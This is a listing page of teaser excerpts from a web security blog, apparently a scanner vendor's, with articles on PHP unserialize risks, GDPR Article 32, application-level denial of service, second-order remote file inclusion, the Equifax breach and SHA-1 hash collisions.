Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code

Why You Should Never Pass Untrusted Data to Unserialize When Writing PHP Code

In PHP, as in every other programming language you use for web development, developers should avoid writing code that passes user-controlled input to dangerous functions. This is one of the basics of secure programming. Whenever a function has the capability to execute a dangerous action, it should either not receive ... Read More
GDPR Article 32

GDPR Article 32: Security of Data Processing

The EU General Data Protection Regulation (GDPR) is a regulation formulated by the European Union to strengthen and unify data protection for all individuals within the European Union (EU). It covers many subjects, such as Privacy by Design and Data Breaches. One section in particular, that applies to all those ... Read More
DEF CON 21 - Ming Chow - Abusing NoSQL Databases

Application Level Denial of Service – An In-Depth Guide

Denial of Service attacks that bring down popular websites often involve thousands of hacked consumer devices and servers. While these attacks mainly aim to overwhelm the target system with traffic, in order to deny service to legitimate users, bugs at the Application Layer (Layer 7 in the OSI model) can ... Read More
This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.

Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example

The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI, attackers do not receive an instant response from the web server, so it is more difficult to detect. This is because the payload that the attacker uses to exploit the ... Read More
The Equifax Breach – The Signs Were There

The Equifax Breach – The Signs Were There

Whenever a big data breach happens – like the Equifax one – there is almost always a predictable order of subsequent events: The breach happens The affected company announces it The news outlets pick up the story and make it known to the general public Security researchers wonder how the ... Read More
Missed Black Hat or DEF CON? We've got you covered

Missed Black Hat or DEF CON? We’ve got you covered

/ / blackhat, DEF CON
I'm sure lots of you are sad that Black Hat USA 2017 and DEF CON 25 are over. You had a hell of a time in Las Vegas, were given the opportunity to listen to some great talks and meet people who share the same interest. And of course, you've ... Read More
XSS Tunnelling Tutorial

Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls

/ / developers, Hacking
Software and web developers, owners of the latest IOT gadgets and people who just like to surf the web at home have one thing in common, they are all protected by a firewall. Businesses typically protect their networks with hardware, dedicated and robu ... Read More
Collision Based Hashing Algorithm Disclosure

Collision Based Hashing Algorithm Disclosure

In February 2017 a number of Google Engineers created the first SHA-1 collision. Even though this hashing algorithm has already been marked as deprecated by NIST in 2011, it is still widely used. What are Hash Collisions? A hash collision happen ... Read More